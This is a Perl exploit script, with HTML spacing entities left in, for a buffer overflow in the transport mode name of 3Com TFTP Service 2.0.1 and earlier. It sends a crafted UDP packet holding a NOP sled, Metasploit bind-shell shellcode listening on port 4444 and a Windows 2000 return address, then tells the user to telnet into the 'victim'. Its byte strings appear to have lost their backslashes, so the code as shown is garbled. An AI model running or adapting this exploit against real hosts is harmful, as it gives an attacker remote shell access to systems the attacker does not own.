3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)

#!/usr/bin/perl&nbsp;-w #&nbsp;=============================================================================================== #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3Com&nbsp;TFTP&nbsp;Service&nbsp;<=&nbsp;2.0.1&nbsp;(Long&nbsp;Transporting&nbsp;Mode)&nbsp;Overflow&nbsp;Perl&nbsp;Exploit #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By&nbsp;Umesh&nbsp;Wanve&nbsp;(umesh_345@yahoo.com) #&nbsp;==============================================================================================&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&nbsp;Credits&nbsp;:&nbsp;Liu&nbsp;Qixu&nbsp;is&nbsp;credited&nbsp;with&nbsp;the&nbsp;discovery&nbsp;of&nbsp;this&nbsp;vulnerability. # #&nbsp;Reference&nbsp;:&nbsp;http://www.securityfocus.com/bid/21301 # #&nbsp;Date&nbsp;:&nbsp;27-02-2007 # #&nbsp;Tested&nbsp;on&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;Server&nbsp;English #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;Professional&nbsp;English # #&nbsp;You&nbsp;can&nbsp;replace&nbsp;shellcode&nbsp;with&nbsp;your&nbsp;favourite&nbsp;one&nbsp;:) # #&nbsp; #&nbsp;Buffer&nbsp;overflow&nbsp;exists&nbsp;in&nbsp;transporting&nbsp;mode&nbsp;name&nbsp;of&nbsp;TFTP&nbsp;server. #&nbsp; #&nbsp;So&nbsp;here&nbsp;you&nbsp;go. # #&nbsp;Buffer&nbsp;=&nbsp;\"x00x02\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;+&nbsp;&nbsp;\"filename\"&nbsp;&nbsp;&nbsp;&nbsp;+&nbsp;&nbsp;\"x00\"&nbsp;+&nbsp;&nbsp;nop&nbsp;sled&nbsp;+&nbsp;&nbsp;Shellcode&nbsp;+&nbsp;JUMP&nbsp;&nbsp;+&nbsp;\"x00\"; #&nbsp; # #&nbsp;This&nbsp;was&nbsp;written&nbsp;for&nbsp;educational&nbsp;purpose.&nbsp;Use&nbsp;it&nbsp;at&nbsp;your&nbsp;own&nbsp;risk.Author&nbsp;will&nbsp;be&nbsp;not&nbsp;be&nbsp;responsible&nbsp;for&nbsp;any&nbsp;damage. # #&nbsp;# #=============================================================================================== use&nbsp;IO::Socket; if(!($ARGV[1])) { &nbsp;print&nbsp;\" 3COM&nbsp;Tftp&nbsp;long&nbsp;transport&nbsp;name&nbsp;exploit \"; &nbsp;print&nbsp;\" Coded&nbsp;by&nbsp;Umesh&nbsp;wanve \"; &nbsp;print&nbsp;\"Use:&nbsp;3com_tftp.pl&nbsp;<host>&nbsp;<port> \"; &nbsp;exit; } $target&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\'udp\', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PeerAddr=>$ARGV[0], &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PeerPort=>$ARGV[1]) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or&nbsp;die&nbsp;\"Cannot&nbsp;connect&nbsp;to&nbsp;$ARGV[0]&nbsp;on&nbsp;port&nbsp;$ARGV[1]\"; #&nbsp;win32_bind&nbsp;-&nbsp;&nbsp;EXITFUNC=seh&nbsp;LPORT=4444&nbsp;Size=344&nbsp;Encoder=PexFnstenvSub&nbsp;http://metasploit.com &nbsp; my($shellcode)= \"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x48\". \"xc8xb3x54x83xebxfcxe2xf4xb4xa2x58x19xa0x31x4cxab\". \"xb7xa8x38x38x6cxecx38x11x74x43xcfx51x30xc9x5cxdf\". \"x07xd0x38x0bx68xc9x58x1dxc3xfcx38x55xa6xf9x73xcd\". \"xe4x4cx73x20x4fx09x79x59x49x0ax58xa0x73x9cx97x7c\". \"x3dx2dx38x0bx6cxc9x58x32xc3xc4xf8xdfx17xd4xb2xbf\". \"x4bxe4x38xddx24xecxafx35x8bxf9x68x30xc3x8bx83xdf\". \"x08xc4x38x24x54x65x38x14x40x96xdbxdax06xc6x5fx04\". \"xb7x1exd5x07x2exa0x80x66x20xbfxc0x66x17x9cx4cx84\". \"x20x03x5exa8x73x98x4cx82x17x41x56x32xc9x25xbbx56\". \"x1dxa2xb1xabx98xa0x6ax5dxbdx65xe4xabx9ex9bxe0x07\". \"x1bx9bxf0x07x0bx9bx4cx84x2exa0xa2x08x2ex9bx3axb5\". \"xddxa0x17x4ex38x0fxe4xabx9exa2xa3x05x1dx37x63x3c\". \"xecx65x9dxbdx1fx37x65x07x1dx37x63x3cxadx81x35x1d\". \"x1fx37x65x04x1cx9cxe6xabx98x5bxdbxb3x31x0excax03\". \"xb7x1exe6xabx98xaexd9x30x2exa0xd0x39xc1x2dxd9x04\". \"x11xe1x7fxddxafxa2xf7xddxaaxf9x73xa7xe2x36xf1x79\". \"xb6x8ax9fxc7xc5xb2x8bxffxe3x63xdbx26xb6x7bxa5xab\". \"x3dx8cx4cx82x13x9fxe1x05x19x99xd9x55x19x99xe6x05\". \"xb7x18xdbxf9x91xcdx7dx07xb7x1exd9xabxb7xffx4cx84\". \"xc3x9fx4fxd7x8cxacx4cx82x1ax37x63x3cxb8x42xb7x0b\". \"x1bx37x65xabx98xc8xb3x54\"; print&nbsp;\"++&nbsp;Building&nbsp;Malicous&nbsp;Packet&nbsp;..... \"; $nop=\"x90\"&nbsp;x&nbsp;129;&nbsp;&nbsp; $jmp_2000&nbsp;=&nbsp;\"x0ex08xe5x77\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;jmp&nbsp;esi&nbsp;user32.dll&nbsp;windows&nbsp;2000&nbsp;sp4&nbsp;english&nbsp;(on&nbsp;27-02-2007) $exploit&nbsp;=&nbsp;\"x00x02\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#write&nbsp;request&nbsp;(header) $exploit=$exploit.\"A\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#file&nbsp;name&nbsp;&nbsp;&nbsp; $exploit=$exploit.\"x00\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#Start&nbsp;of&nbsp;transporting&nbsp;name $exploit=$exploit.$nop;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#nop&nbsp;sled&nbsp;to&nbsp;land&nbsp;into&nbsp;shellcode&nbsp; $exploit=$exploit.$shellcode;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#our&nbsp;Hell&nbsp;code&nbsp; $exploit=$exploit.$jmp_2000;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#jump&nbsp;to&nbsp;shellcode&nbsp; $exploit=$exploit.\"x00\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#end&nbsp;of&nbsp;TS&nbsp;mode&nbsp;name print&nbsp;$target&nbsp;$exploit;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#Attack&nbsp;on&nbsp;victim print&nbsp;\"++&nbsp;Exploit&nbsp;packet&nbsp;sent&nbsp;... \"; print&nbsp;\"++&nbsp;Done. \"; print&nbsp;\"++&nbsp;Telnet&nbsp;to&nbsp;4444&nbsp;on&nbsp;victim\'s&nbsp;machine&nbsp;.... \"; sleep(2); close($target); exit; #------------------------------------------------------------------------------------------------------------ &nbsp;